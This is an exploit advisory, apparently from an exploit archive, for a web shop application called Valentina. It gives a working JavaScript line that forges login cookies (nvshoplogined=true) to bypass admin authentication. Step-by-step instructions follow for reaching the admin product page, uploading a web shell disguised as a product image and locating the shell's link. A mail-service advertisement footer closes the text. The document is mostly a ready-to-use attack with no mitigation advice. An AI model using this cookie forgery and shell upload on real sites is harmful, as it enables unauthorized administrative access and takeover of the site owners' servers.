Valentina suffers from a cookie handling vulnerability that allows for privilege escalation and a shell upload.
14a549b7355f6602692da4dfd32c3ac09737b0f82c5eec644aa9dfcfcd8418cd
< ------------------- header data start ------------------- >
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
# Application Name : Valentina
# Vulnerable Type : Cookie Handling Vulnerebility
# Infection : SQL Info GET...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
javascript:document.cookie = "nvshoplogin=; path=/;"; document.cookie = "nvshoplogined=true; path=/;"; document.cookie = "nvshoppassword=; path=/;";
1. Cookie Changed,
2. Go To http://[target]/[path]/admin/goods.php
3. Add Product And Add Ýmage(Shell) Upload.
4. Go to Add Product Page > Product Image Right Click > Features > *SHELL LINK* ;)
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
_________________________________________________________________
Teker teker mi, yoksa hepsi birden mi? Arkadaþlarýnýzla ilgili güncel bilgileri tek bir yerden edinin.
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx